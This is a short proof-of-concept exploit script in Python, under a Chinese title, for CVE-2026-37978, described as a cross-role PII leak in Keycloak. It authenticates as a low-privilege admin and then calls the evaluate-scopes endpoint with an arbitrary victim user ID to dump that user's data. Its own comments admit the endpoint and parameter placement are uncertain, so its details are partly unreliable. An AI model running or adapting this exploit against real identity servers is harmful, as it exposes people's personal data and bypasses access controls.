CVE-2026-37978 Keycloak跨角色PII信息泄露漏洞

import requests # Exploit Title: Keycloak CVE-2026-37978 POC # Description: Leaks PII via evaluate-scopes API with arbitrary userId target_url = "http://keycloak.example.com/auth/admin/realms/master" username = "low_priv_admin" password = "password" client_id = "admin-cli" # 1. Authenticate as low-privilege admin auth_url = f"{target_url}/protocol/openid-connect/token" data = { "client_id": client_id, "username": username, "password": password, "grant_type": "password" } session = requests.post(auth_url, data=data) if session.status_code != 200: print("Authentication failed") exit(1) token = session.json().get("access_token") headers = {"Authorization": f"Bearer {token}"} # 2. Exploit: Call evaluate-scopes with an arbitrary userId # The vulnerability allows specifying any user ID (victim's ID) # even if the admin only has 'view-clients' role. client_uuid = "target-client-uuid" arbitrary_user_id = "victim-user-uuid" # ID of the user to impersonate/leak # Endpoint may vary slightly based on Keycloak version, typically involves scope mapping evaluation exploit_url = f"{target_url}/clients/{client_uuid}/evaluate-scopes/scope-mappings" # Passing the arbitrary userId in query parameters or body depending on specific API behavior params = {"userId": arbitrary_user_id} response = requests.get(exploit_url, headers=headers, params=params) if response.status_code == 200: print("[+] Vulnerability Exploited Successfully!") print(f"[+] Leaked Data for User {arbitrary_user_id}:") print(response.json()) else: print("[-] Exploit failed or endpoint not reachable")